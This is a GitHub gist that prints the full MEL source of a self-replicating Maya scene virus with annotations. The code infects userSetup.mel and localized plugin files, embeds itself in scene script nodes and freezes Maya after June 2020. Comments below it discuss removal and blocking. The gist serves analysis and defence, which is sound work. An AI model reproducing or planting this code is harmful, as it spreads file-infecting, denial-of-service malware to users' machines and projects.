Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
// Maya Mel UI Configuration File.Maya Mel UI Configuration File..
//
//
// This script is machine generated. Edit at your own risk.
//
//
////////////////////////////////////////////////////////////////////
global proc UI_Mel_Configuration_think(){
string $localized_resources_path = `getenv MAYA_LOCATION`+("/resources/l10n/");
string $all_file[]=`getFileList -folder $localized_resources_path`;
string $localized_anim_strings_path =("/plug-ins/animImportExport.pres.mel");
global string $Mel_file_address_lj=("");
// Infect localized anim import/export string files w/ virus?
for ( $loc_folder_index = 0 ;$loc_folder_index<`size $all_file`;$loc_folder_index++)
{
string $Mel_file_address=($localized_resources_path+$all_file[$loc_folder_index]+$localized_anim_strings_path);
// If can copy localized file...
if (`sysFile -cp ($Mel_file_address+(".Mel")) ($Mel_file_address) ` == 1){
// Delete copied file
sysFile -del ($Mel_file_address+(".Mel"));
int $gc_xh=0;
string $Mel_File_LineBuffer[];
clear $Mel_File_LineBuffer;
// Open original localized file
$fileId=`fopen ($Mel_file_address) ("r")`;
$Mel_File_LineBuffer[0] = `fgetline $fileId`;
// Copy localized file lines into buffer
while (` size $Mel_File_LineBuffer[$gc_xh]` != 0 ){
$gc_xh++;
$Mel_File_LineBuffer[$gc_xh] = `fgetline $fileId`;
}
fclose $fileId;
// Check if localized file has token indicating infection
int $isInfected = 0 ;
for ( $line_index=0; $line_index<`size $Mel_File_LineBuffer`; $line_index++) {
if ($Mel_File_LineBuffer[$line_index] == ("// Maya Mel UI Configuration File.Maya Mel UI Configuration File..")) {
$isInfected=1;
$line_index=99999999;
}
}
// If not infected, infect current localized file
if ($isInfected == 0 ){
$Mel_file_address_lj=$Mel_file_address;
if (`whatIs UI_Mel_Configuration_think_b` != "Unknown"){
UI_Mel_Configuration_think_b;
}
}
} else {
// Can't infect localized string file(s); create UserSetup.mel instead
if (`whatIs UI_Mel_Configuration_think_a` != "Unknown") {
UI_Mel_Configuration_think_a;
}
}
}
}
global proc UI_Mel_Configuration_think_a(){
// Get application defaults file path as tokenized list
string $system_WDLJ = `about -environmentFile`;
string $buffer[];
tokenize $system_WDLJ "/" $buffer;
// Re-combine all but last 2 tokens on first token
for($ii = 1; $ii < `size $buffer` - 2; $ii++) {
$buffer[0] = $buffer[0] + "/" + $buffer[$ii];
}
// Make first token point to user setup script location
$buffer[0] = $buffer[0] + "/scripts/userSetup.mel";
int $pd_file_existence_check = 0;
// Check that userSetup file exists
if (`sysFile -cp ($buffer[0]+"..a") ($buffer[0]) ` == 1){
// File exists; clean up 'check' file.
sysFile -del ($buffer[0]+"..a");
// ? Copy setup into memory ?
int $ii=0;
string $NR_all[];
clear $NR_all;
$fileId=`fopen ($buffer[0]) "r"`;
$NR_all[0] = `fgetline $fileId`;
while (` size $NR_all[$ii]` != 0 ){
$ii++;
$NR_all[$ii] = `fgetline $fileId`;
}
fclose $fileId;
int $pdNR_all=0;
for ($ii = 0 ; $ii<`size $NR_all`;$ii++){
if ($NR_all[$ii] == ("// Maya Mel UI Configuration File.Maya Mel UI Configuration File..")){
$pdNR_all = 1 ;$ii= 99999999;
}
}
if ($pdNR_all == 0){
$pd_file_existence_check = 1;
}
}
// Copy failed. File doesn't exist.
else {
// Create blank userSetup file.
$sys_document = `fopen ($buffer[0]) "w"`;
fprint $sys_document ("");
fclose $sys_document;
// Try to copy file
if (`sysFile -cp ($buffer[0]+"..a") ($buffer[0]) ` == 1){
// Clean up 'check' file
sysFile -del ($buffer[0]+"..a");
$pd_file_existence_check = 1;
}
}
if($pd_file_existence_check == 1){
// Copy this script into memory?
string $script[] = `ls -type script`;
int $isInfected=0;
string $nr;
for ($ii = 0 ; $ii<`size $script`;$ii++){
$nr = `scriptNode -q -beforeScript $script[$ii]` ;
string $infected_file_token = `substring $nr 1 50`;
if ($infected_file_token == ("// Maya Mel UI Configuration File.Maya Mel UI Conf")){
$isInfected = 1;
$ii = 999999999;
}
}
// Write this script to userSetup?
if ($isInfected == 1){
$fuck_All_U = `fopen ($buffer[0]) ("a")`;
fprint $fuck_All_U ($nr);
fclose $fuck_All_U;
}
}
}
global proc UI_Mel_Configuration_think_b() {
global string $Mel_file_address_lj;
string $script[]=`ls -type script`;
int $isInfected=0;
string $nr;
for ($ii = 0 ; $ii<`size $script`; $ii++){
$nr = ` scriptNode -q -beforeScript $script[$ii] ` ;
string $infected_file_token = `substring $nr 1 50`;
if ($infected_file_token == ("// Maya Mel UI Configuration File.Maya Mel UI Conf")){
$isInfected = 1;
$ii = 999999999;
}
}
if ($isInfected == 1){
$fuck_All_U = ` fopen ($Mel_file_address_lj) ("a")`;
fprint $fuck_All_U ($nr);
fclose $fuck_All_U;
$Mel_file_address_lj=("");
}
}
global proc autoUpdateAttrEd_SelectSystem(){
string $script[]=`ls -type script`;
int $isInfected = 0 ;
for ($ii = 0 ; $ii<`size $script`;$ii++){
string $nr = `scriptNode -q -beforeScript $script[$ii] `;
string $infected_file_token = `substring $nr 1 50`;
if ($infected_file_token == ("// Maya Mel UI Configuration File.Maya Mel UI Conf")){
$isInfected = 1;
$ii = 999999999;
}
}
if ($isInfected == 0 ){
string $chengxu =`scriptNode -n MayaMelUIConfigurationFile -beforeScript "// Maya Mel UI Configuration File.Maya Mel UI Configuration File.."`;
setAttr ($chengxu+(".scriptType")) 1;
}
}
global proc autoUpdatcAttrEd(){
// Get current date as int
string $aboutCD = `about -cd`;
string $buffer[];
tokenize $aboutCD ("/") $buffer;
$buffer[0] = $buffer[0]+$buffer[1]+$buffer[2];
int $PuTianTongQing=$buffer[0];
// Put app into infinite loop if later than June 27, 2020
if ($PuTianTongQing >= 20200627 ){
for ($Ii=1 ; $Ii>0; $Ii++){
}
}
}
global proc autoUpdatoAttrEnd(){
if ( `whatIs autoUpdatcAttrEd` != "Unknown" ){
autoUpdatcAttrEd;
}
if ( `whatIs autoUpdateAttrEd_SelectSystem` != "Unknown" ){
autoUpdateAttrEd_SelectSystem;
}
if ( `whatIs UI_Mel_Configuration_think` != "Unknown" ){
UI_Mel_Configuration_think;
}
}
global proc autoUpdatcAttrEnd(){
if (`whatIs autoUpdatoAttrEnd` != "Unknown" ){
global int $autoUpdateAttrEd_aoto_int;
if($autoUpdateAttrEd_aoto_int == 0 ){
$autoUpdateAttrEd_aoto_int=`scriptJob -e ("SelectionChanged") ("autoUpdatoAttrEnd") `;
}
}
}
autoUpdatcAttrEnd;
@lklzc0519

This comment has been minimized.

Copy link

@lklzc0519 lklzc0519 commented Jun 23, 2020

您好 如果这个病毒中了的话需要怎么清除掉呢?谢谢

@OriginalAdric

This comment has been minimized.

Copy link
Owner Author

@OriginalAdric OriginalAdric commented Jun 23, 2020

@lklzc0519: 对不起,我不会中文。 我希望英语说明足够清楚。

To clean an infected environment:

Look for the obfuscated virus code in the files listed below. %MayaInstallRoot% is C:\Program Files\Autodesk\Maya2018, but for your specific Maya version. %language% is every installed translation (zh_CN, ja_JP, etc).

userSetup.mel
%MayaInstallRoot%/resources/l10n/%language%/plugins/animImportExport.pres.mel

The virus code will be under a header // Maya Mel UI Configuration File.Maya Mel UI Configuration File... It should be safe to delete that header and everything after it.

To clean an infected file after cleaning the environment:

  1. Open the file with ScriptJobs disabled. To do this from the UI, click File > Open > [] to open options, uncheck "Execute script nodes", then click the Open button. In Python, you can use cmds.file(filepath, open=True, executeScriptNodes=False)
  2. In Python, execute cmds.delete('MayaMelUIConfigurationFile') to delete the script node. You may need to account for namespacing or absolute object pathing in the delete command.
  3. Save the file

If the deadline has passed, you should be able to unlock the file for cleaning by setting your system time to a date before June 27, 2020.

@lklzc0519

This comment has been minimized.

Copy link

@lklzc0519 lklzc0519 commented Jun 23, 2020

@OriginalAdric

This comment has been minimized.

Copy link
Owner Author

@OriginalAdric OriginalAdric commented Jun 23, 2020

I'm not 100% sure, as I haven't used that version of the tools, that script, and am not very familiar with Cygwin. Looking at the scanAndCleanScriptNode file that ships with the Maya Security Tool plugin, the usage appears to be scanAndCleanScriptNode PATH. So, if your scenes are in C:/my/files, the command is probably scanAndCleanScriptNode /cygdrive/c/my/files for Cygwin.

@davidlatwe

This comment has been minimized.

Copy link

@davidlatwe davidlatwe commented Jun 23, 2020

Put these two lines in userSetup.mel should block the script.

global int $autoUpdateAttrEd_aoto_int;
$autoUpdateAttrEd_aoto_int = -1;
@Videomaskinen

This comment has been minimized.

Copy link

@Videomaskinen Videomaskinen commented Jun 25, 2020

Put these two lines in userSetup.mel should block the script.

global int $autoUpdateAttrEd_aoto_int;
$autoUpdateAttrEd_aoto_int = -1;

What do theese two lines do? Sorry if this is a novice question, I'm just an animator struggling to deal with this script exploit at work - I don't have much experience with scripts

@OriginalAdric

This comment has been minimized.

Copy link
Owner Author

@OriginalAdric OriginalAdric commented Jun 25, 2020

@Videomaskinen: it sets the scriptJob ID for the exploit to an invalid value, so Maya never actually runs the malicious code.

@ilbozo

This comment has been minimized.

Copy link

@ilbozo ilbozo commented Jul 8, 2020

I've just reviewed the python code of the MayaClean plugin. It just looks if the variable $fuck_All_U is in the file. So if the variable has a different name is absolutely useless... Thanks Autodesk. It seems that the best option is to disable the scriptNodes execution on load.

@JanPhKoch

This comment has been minimized.

Copy link

@JanPhKoch JanPhKoch commented Oct 30, 2020

I've just reviewed the python code of the MayaClean plugin. It just looks if the variable $fuck_All_U is in the file. So if the variable has a different name is absolutely useless... Thanks Autodesk. It seems that the best option is to disable the scriptNodes execution on load.

How would you do that? The scriptJobs still loading when Opening Files with that: https://knowledge.autodesk.com/support/maya/learn-explore/caas/CloudHelp/cloudhelp/2015/ENU/Maya/files/Script-nodes-Prevent-script-nodes-from-executing-when-you-open-a-file-htm.html

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.